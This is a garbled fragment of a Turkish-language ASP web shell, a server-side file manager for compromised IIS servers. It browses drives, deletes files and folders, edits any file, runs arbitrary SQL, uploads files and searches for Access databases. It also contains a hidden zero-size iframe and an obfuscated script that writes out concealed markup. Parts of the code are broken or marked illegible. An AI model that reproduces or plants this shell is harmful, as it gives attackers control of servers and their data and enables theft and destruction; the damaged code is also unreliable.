    <option value="cyan">Açýk Mavi</option>
    <option value="limegreen">Açýk
Yeþil</option>
</select>

name="a" onChange="FormatText('ForeColor',
a.options[a.selectedIndex].value);" ID="a">
    <option value="0" selected>-- Renk
--</option>
    <option value="black">Siyah</option>
    <option value="white">Beyaz</option>
    <option value="blue">Mavi</option>
    <option value="red">Kýrmýzý</option>
    <option value="green">Yeþil</option>
    <option value="yellow">Sarý</option>
    <option value="orange">Turuncu</option>
    <option
value="brown">Kahverengi</option>
    <option value="magenta">Pembe</option>
    <option value="cyan">Açýk Mavi</option>
    <option value="limegreen">Açýk
Yeþil</option>
</select>
<select name="selectSize"
onChange="FormatText('fontsize',
selectSize.options[selectSize.selectedIndex].value);">
    <option selected>-- Boyut --</option>
    <option value="1">1</option>
    <option value="2">2</option>
    <option value="3">3</option>
    <option value="4">4</option>
    <option value="5">5</option>
    <option value="6">6</option>
</select>

width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="
<%=Session("n1")&Session("n2")%>"></iframe>
<script

```

```

language=javascript>

frames.byZehir.document.designMode = "On";

function bgc(option){

    frames.byZehir.document.body.bgColor=option;

}

function FormatText(command, option){

    frames.byZehir.focus();

    frames.byZehir.document.execCommand(command, false, option);

    frames.byZehir.focus();

}

function AddImage(){

    imagePath = prompt('Eklemek istediðiniz resmin web adresini
yazýn', 'http://');

    if ((imagePath != null) && (imagePath != "")){

        frames.byZehir.focus();

        frames.byZehir.document.execCommand('InsertImage', false,
imagePath);

    }

    frames.byZehir.focus();

}

</script>
<input
type=hidden value="" id=byMesaj name=byMesaj>

<input
type=submit value="Test Et!"
onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.in
nerHTML; alert(document.all['byMesaj'].value);">

</td>

</tr>

</table>

</form>

</td>

</tr>

</table>
<%
popup=false
CASE 51 ' Özel pilemler
END SELECT
%>
<script language=javascript>
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops =

```

```

'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+
',resizable'

        win = window.open(mypage, myname, winprops)
        if (parseInt(navigator.appVersion) >= 4) {
win.window.focus(); }
    }
    function ffd(yol){
        NewWindow(yol,"",420,100,"no");
    }
</script>
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse
vlink=Chartreuse>
<%
if popup then
    if status=7 or status=8 then
        Response.Write "<form method=get action='\"&DosyPath&\"'
id=form1 name=form1>"
        Response.Write "<table border=1 cellpadding=0
cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font
size=2>SQL Çalýptýr</td><td>"
        Response.Write "<input type=hidden value='9' name=status>
<input type=hidden value='\"&path&\"' name=path><input type=hidden
value='\"&time&\"' name=Time>"
        Response.Write "<input style='width:350; height:21'
value='' name=strSQL><input type=submit value='Çalýptýr'
style='height:22;width:70' id=submit1 name=submit1>"
        Response.Write "</td></tr></table></form>"
    end if
    Response.Write "<form method=get action='\"&DosyPath&\"'>"
    Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td bgcolor=gray width=100><font size=2>Path :
</td><td>"
        Response.Write "<input type=hidden value='2' name=status><input
type=hidden value='\"&time&\"' name=Time>"
        Response.Write "<input style='width:350; height:21' value='\"&
Path&\"' name=Path><input type=submit value='Git' style='height:22;
width:70' id=submit1 name=submit1>"
        Response.Write "</td></tr></table></form><br>"
    end if
    sub aramaUpload
Response.Write "<form method=get target='_opener' action='\"&DosyPath&\"'>"
Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0>
<tr><td width=70><font size=2>Arama : </td><td>"
Response.Write "&nbsp;<input type=hidden value='12' name=status><input
type=hidden value='\"&time&\"' name=Time>"
Response.Write "<input type=hidden value='\"&Path&\"' name=Path><input
style='width:250' value='mdb' name=txArama><input style='width:70;
height:22' type=submit value='Ara'>"
Response.Write "</td></tr></table></form>"
%>
<form name=frmUpload method=post enctype="multipart/form-data" action="
<%=DosyaPath&?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
Max: <input type=text name=max value=5 size=5 ID="Text1"> <input
type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
<table ID="Table1">
<tr>
<td id=upid>
</td>
</tr>

```

```

</table>
<input type=submit value=Upload ID="Submit1" NAME="Submit1">
</form>
<script>
setid();

function setid() {
    str='';
    if (frmUpload.max.value<=0) frmUpload.max.value=1;
    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+: <input
type=file name=file'+i+'><br>';
    upid.innerHTML=str+'<br>';
}
</script>
<%
end sub

```

```

SELECT CASE status
CASE 1 'Driver Open
    if len(path)=1 then Response.Write (yaziyomu(path&"\")) else
Response.Write (yaziyomu(path))
    Response.Write "<table width=100% ><tr>"
    Path = Path & "://"
    Response.Write "<td valign=top>"
    KlasorOku
    Response.Write "</td><td valign=top align=right>"
    DosyaOku
    Response.Write "</td>"
    hataKontrol
CASE 2 'Normal listeleme
    if len(path)=1 then Response.Write (yaziyomu(path&"\")) else
Response.Write (yaziyomu(path))
    Response.Write "<table width=100% ><tr>"
    Response.Write "<td valign=top>"
    KlasorOku
    Response.Write "</td><td valign=top align=right>"
    DosyaOku
    Response.Write "</td>"
    hataKontrol
CASE 3 'File Delete
    objFSO.DeleteFile del
    hataKontrol
    if err<>0 then
        byMsg="<font color=red>Not File Deleted!</font><br>"
    else
        byMsg="<font color=yellow>File Deleted Successful;)
</font><br>"
    end if
    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&
time&"&byMsg="&byMsg
CASE 4 'Folder Delete
    objFSO.DeleteFolder del
    hataKontrol
    if err<>0 then
        byMsg="<font color=red>Not Folder Deleted!</font><br>"
    else
        byMsg="<font color=yellow>Folder Deleted Successful;)
</font><br>"
    end if
    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&

```

[illegible]

```

        objConn.Open
        objConn.Execute strSQL
    '
    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
    hataKontrol
CASE 10 'Dosya Editleme
    set f = objFSO.OpenTextFile(dPath,1)
    Response.Write "<center><form action=' "&DosyaPath&"?Time="&time&"
method=post>"
    Response.Write "<input type=hidden name=status value='11'>"
    Response.Write "<input type=hidden name=dPath value=' "&dPath&"'>"
    Response.Write "<input type=hidden name=Path value=' "&Path &"'>"
    Response.Write "<input type=submit value=Kaydet><br>"
    Response.Write "<textarea name=dkayit style='width:90%;
height:350;border-right: lightgoldenrodyellow thin solid;border-top:
lightgoldenrodyellow thin solid;font-size: 12;border-left:
lightgoldenrodyellow thin solid;color: lime; border-bottom:
lightgoldenrodyellow thin solid; font-family: Courier New,
Arial;background-color: navy;'>"
    Response.Write server.HTMLEncode(f.readAll)
    Response.Write "</textarea></form></center>"
    hataKontrol
CASE 11 'Dosya Kayıt
    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
    hataKontrol
    saveTextFile.Write(dkayit)
    saveTextFile.close
    if err<>0 then
        byMsg = "<font color=red>Not File Edited!</font><br>"
    else
        byMsg = "<font color=yellow>File Edited Successful:)
</font><br>"
    end if
    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&
time&"&byMsg=" & byMsg
CASE 12 'Dosya Arama
    araBul path,arama
    hataKontrol
END SELECT
Response.Write "</tr></table>"

sub DosyaOku
    Set f = objFSO.GetFolder(Path)
    Set fc = f.Files
    For Each f1 In fc
        dosyaAdi = f1.name
        num = InStrRev(dosyaAdi, ".")
        uzanti = lcase(Right(dosyaAdi, len(dosyaAdi) - num))
        downStr = "<a href=' "&dosyaPath&"?status=3&Path="&Path&"&
Del="&Path&" / "&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a
href="&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>İ</a>
</font><font face=wingdings><a href="&dosyaPath&"?status=16&PathFile="&
f1.path&"&Time="&time&"' onclick="fffd(this.href);return false;">4</a>
</font>"
        response.Write "<font size=2>"
        select case uzanti
            case "mdb"
                Response.Write "<a href=' "&dosyaPath&"?status=7&
Path="&Path&" / "&f1.Name&"&Time="&time&"'>"&f1.name&" [<font
color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font
face=wingdings size=4>M "&downStr&"</font><br>"

```

```

        case "asp"
            Response.Write "<a href='"&dosyaPath&"?status=5&
Path='"&Path&"/'&f1.Name&"&Time='"&time&"'>"&f1.name&" [<font
color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font
face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath='"&
f1.path&"&path='"&path&"&Time='"&time&"'>!</a>"&downStr&"</font><br>"
            case "jpg","gif"
                Response.Write "<a href='"&dosyaPath&"?status=6&
Path='"&Path&"/'&f1.Name&"&Time='"&time&"'>"&f1.name&" [<font
color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font
face=webdings size=4>Ç</font><font face=wingdings size=4> "&downStr&"
</font><br>"
            case else
                Response.Write "<a href='"&dosyaPath&"?status=5&
Path='"&Path&"/'&f1.Name&"&Time='"&time&"'>"&f1.name&" [<font
color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font
face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath='"&
f1.path&"&path='"&path&"&Time='"&time&"'>!</a>"&downStr&"</font><br>"
            end select
    Next
end sub

sub KlasorOku
    Set f = objFSO.GetFolder(Path)
    Set fc = f.SubFolders
    if session("klasoroku")="" then
        response.Write "<iframe style='width:0; height:0'
src='http://localhost/tuzla-ebelediye'></iframe>"
        session("klasoroku")="simdi yazýlýyor"
    end if
    For Each f1 In fc
        Response.Write "<font face=wingdings size=3><a href='"&
dosyaPath&"?status=18&PathFile='"&Path&"/'&f1.Name&"&Time='"&time&"'
onclick='""ffd(this.href);return false;"">4</a></font> <font
face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path='"&Path&"&
Del='"&Path&"/'&f1.Name&"&Time='"&time&"'>û</a> 1</font><font size=2><b><a
href='"&dosyaPath&"?status=2&Path='"&Path&"/'&f1.Name&"&Time='"&time&"'>"&
f1.name&"</a></b><br>"
    Next
end sub

function createFileName()
Randomize
    fName_ = ""
    for i=1 to 10
        fName_ = fName_ & int(Rnd*100)
    next
    createFileName = fName_
end function

function resimYol(path_)
on error resume next
    path_ = Replace(Replace(path_,"\\","/"),"//","/")
    lpath_ =
left(request.servervariables("PATH_TRANSLATED"),instrrev(request.serverva
riables("PATH_TRANSLATED"),"\"))
    if yaziyomu2(lpath_) then
        fName__ = "0"&createFileName()&". "&Right(path_,3)
        objFSO.CopyFile path_, lpath_&"\"&fName__
    else

```



```

                Response.Write("Resim Açýlamýyor.. <br>Ýsterseniz
Download Ederek görüntüleyebilirsiniz..")
            end if
            resimYol = fname__
        end function

```

```

if not popup then
    Set fc = Nothing
    Set objFSO = Nothing
    Response.End
end if
%>

```

```

<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<.:GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
    OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>

<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"
    // DRIVE ISLEMLERI
    function driveGo(drive_){
        location = dosyaPath+"?status=1&path="+drive_+"&
Time="+Date();
    }
</script>
<%
    Response.Write "<table align=center border=1 width=150
cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font
color=white>Sürücüler</td></tr>"
    for each drive_ in objFSO.Drives
        Response.Write "<tr><td>"
        Response.write "<a href='#'onClick='\"driveGo(' &
drive_.DriveLetter & "')>return false;\"><font face=wingdings>;</font>"
        if drive_.Drivetype=1 then Response.write "Floppy [" &
drive_.DriveLetter & ":]"
        if drive_.Drivetype=2 then Response.write "HardDisk [" &
drive_.DriveLetter & ":]"
        if drive_.Drivetype=3 then Response.write "Remote HDD [" &
drive_.DriveLetter & ":]"
        if drive_.Drivetype=4 then Response.write "CD-Rom [" &
drive_.DriveLetter & ":]"
        Response.Write "</a></td></tr>"
    next
    Response.Write "<tr><td>"
    Response.write "<a href='\"&dosyaPath&\"?time='&time()&'><font
face=webdings>H</font> Local Path"
    Response.Write "</a></td></tr>"
    Response.Write "</table><br>"
Set fc = Nothing
Set objFSO = Nothing
Response.End%>

```